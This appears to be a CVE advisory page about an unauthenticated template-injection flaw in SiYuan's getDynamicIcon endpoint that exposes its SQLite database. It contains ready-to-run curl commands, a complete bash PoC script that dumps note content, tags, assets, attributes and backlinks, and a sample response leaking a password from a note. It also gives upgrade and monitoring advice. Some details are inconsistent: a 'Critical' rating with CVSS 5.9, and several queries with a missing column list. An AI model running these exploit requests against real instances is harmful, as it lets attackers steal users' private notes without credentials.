SiYuan, Authentication Bypass via Template Injection leading to SQLite Data Exfiltration, CVE-2026-54068 (Critical) -DC-Jul2026-864

Listen to this Post

How CVE-2026-54068 Works

The vulnerability resides in the kernel router of SiYuan, an open-source personal knowledge management system. In the router.go file, the `/api/icon/getDynamicIcon` endpoint is explicitly marked with the comment `”不需要鉴权”` (no authentication required), placing it outside the authentication middleware.
When this endpoint is called with the parameter `type=8` and a valid block id, the system invokes the `RenderDynamicIconContentTemplate` function. This function parses the provided `content` parameter as a Go template. The template’s function map includes the `querySQL` and `queryBlocks` functions, which are registered via sql.SQLTemplateFuncs.
The `querySQL` function calls Query(stmt, 1024), executing the provided SQL statement directly against the SiYuan SQLite database. The results of this query are then rendered into the SVG response body and returned to the caller.
An attacker can therefore use the `querySQL` function within the template to execute arbitrary `SELECT` statements. By crafting a request with a `content` parameter like .action{querySQL "SELECT id,content FROM blocks"}, an unauthenticated attacker can exfiltrate all user note content, tags, asset references, and block attributes.
The only constraint is that the attacker must provide a valid block ID. Block IDs are 22-character strings in the format `YYYYMMDDHHMMSS-XXXXXXX` (timestamp + 7 alphanumeric chars). These IDs are often leaked through shared document URLs, referrer headers, or browser history.

The vulnerability is fixed in SiYuan version 3.7.0.

DailyCVE Form:

Platform: SiYuan
Version: < 3.7.0
Vulnerability: Auth Bypass / SQLi
Severity: Critical (CVSS 5.9)
date: 2026-06-24

Prediction: 2026-07-15

What Undercode Say:

Analytics:

Check if the endpoint is accessible without authentication
curl -s -o /dev/null -w "%{http_code}" "http://siyuan.example.com:6806/api/icon/getDynamicIcon?type=8&content=.action{querySQL+%22SELECT+1%22}&id=<KNOWN_BLOCK_ID>"
Expected output: 200 (if vulnerable)
List all database tables
curl -s "http://siyuan.example.com:6806/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT+name+FROM+sqlite_master+WHERE+type%3D%27table%27%22%7D&id=<KNOWN_BLOCK_ID>"
Dump all note content from the blocks table
curl -s "http://siyuan.example.com:6806/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT+id%2Ctype%2Ccontent+FROM+blocks+LIMIT+100%22%7D&id=<KNOWN_BLOCK_ID>"
Dump all tags from the spans table
curl -s "http://siyuan.example.com:6806/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+spans+LIMIT+50%22%7D&id=<KNOWN_BLOCK_ID>"
Dump all asset references
curl -s "http://siyuan.example.com:6806/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+assets+LIMIT+50%22%7D&id=<KNOWN_BLOCK_ID>"

PoC Script (`poc_getDynamicIcon_sqli.sh`):

!/bin/bash
PoC for CVE-2026-54068 - SiYuan unauthenticated SQLite data exfiltration
Usage: ./poc_getDynamicIcon_sqli.sh <TARGET> <BLOCK_ID>
TARGET="${1:-http://localhost:6806}"
BLOCK_ID="${2}"
if [ -z "$BLOCK_ID" ]; then
echo "Usage: $0 <TARGET> <BLOCK_ID>"
echo "Example: $0 http://siyuan.example.com:6806 20260524010447-jc9ypd4"
exit 1
fi
echo "[] Target: $TARGET"
echo "[] Block ID: $BLOCK_ID"
echo
1. List all tables
echo "[] Listing all database tables..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT+name+FROM+sqlite_master+WHERE+type%3D%27table%27%22%7D&id=${BLOCK_ID}"
echo -e "\n"
2. Dump blocks table
echo "[] Dumping blocks table (first 100 entries)..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT+id%2Ctype%2Ccontent+FROM+blocks+LIMIT+100%22%7D&id=${BLOCK_ID}"
echo -e "\n"
3. Dump spans table (tags)
echo "[] Dumping spans table (tags)..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+spans+LIMIT+50%22%7D&id=${BLOCK_ID}"
echo -e "\n"
4. Dump assets table
echo "[] Dumping assets table..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+assets+LIMIT+50%22%7D&id=${BLOCK_ID}"
echo -e "\n"
5. Dump attributes table
echo "[] Dumping attributes table..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+attributes+LIMIT+50%22%7D&id=${BLOCK_ID}"
echo -e "\n"
6. Dump refs table (backlinks)
echo "[] Dumping refs table (backlinks)..."
curl -s "${TARGET}/api/icon/getDynamicIcon?type=8&content=.action%7BquerySQL+%22SELECT++FROM+refs+LIMIT+50%22%7D&id=${BLOCK_ID}"
echo -e "\n"
echo "[] PoC completed."

Exploit:

The exploitation of this vulnerability is straightforward and does not require authentication. An attacker needs to:
1. Obtain a valid block ID. This can be done by:
– Finding a shared document URL (e.g., http://siyuan.example.com/share/YYYYMMDDHHMMSS-XXXXXXX`)
- Extracting block IDs from referrer headers or browser history
- Using any other authenticated endpoint that leaks block IDs
- Brute-forcing the 7-character alphanumeric suffix (though this is less practical)
2. Craft a malicious request to the unauthenticated `/api/icon/getDynamicIcon` endpoint with:
- `type=8`
- `content` parameter containing a Go template that calls `querySQL` with an arbitrary `SELECT` statement
- `id` parameter set to the known valid block ID
3. Send the request to the target SiYuan instance. The response will be an SVG image with the query results embedded in the `` elements.
<h2 style="color: blue;">Example Attack Request:</h2>

GET /api/icon/getDynamicIcon?type=8&content=.action{querySQL+"SELECT+id,content+FROM+blocks+LIMIT+5"}&id=20260524010447-jc9ypd4
Host: siyuan.example.com:6806

<h2 style="color: blue;">Response (SVG with exfiltrated data):</h2>

<text ...>[map[id:20260524010447-jc9ypd4 content:test]
map[id:20260524011002-ttaa7lu content:My password is SuperSecret123!]]</text>

The `querySQL` function can query any table in the database, including:
- `blocks` – all note content and metadata
- `spans` – tags
- `assets` – asset references
- `attributes` – block attributes
- `refs` – backlinks
<h2 style="color: blue;">Protection:</h2>
- Upgrade SiYuan to version 3.7.0 or later. This is the official fix that properly secures the endpoint and implements required authorization checks.
- Restrict network access to the SiYuan instance by placing it behind a firewall or reverse proxy that limits exposure to trusted networks.
- Monitor web server logs for unexpected calls to `/api/icon/getDynamicIcon` with `type=8` and investigate any anomalous activity.
- Disable public exposure of the SiYuan instance if not strictly required. Docker deployments default to
0.0.0.0:6806, making them reachable from the network.
- Implement network segmentation to reduce the attack surface for adjacent network threats.
<h2 style="color: blue;">Impact:</h2>
- Complete data breach – All user note content, tags, asset references, block attributes, and backlinks can be exfiltrated without authentication.
- Confidentiality compromise – The vulnerability affects the confidentiality principle of the system's security model.
- Wide attack surface – Any network-reachable SiYuan instance (Docker deployments default to
0.0.0.0:6806`) is vulnerable. Block IDs are often leaked through shared URLs, embedded images, and browser history.
– No authentication required – The attack can be launched remotely without any credentials.
– Distinct from previous issues – This vulnerability is distinct from previously reported SQL injection issues (GHSA-j7wh-x834-p3r7) which targeted the search API. The `getDynamicIcon` endpoint was never intended to execute SQL queries but gained this capability through the `querySQL` template function registered for the icon content template renderer.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top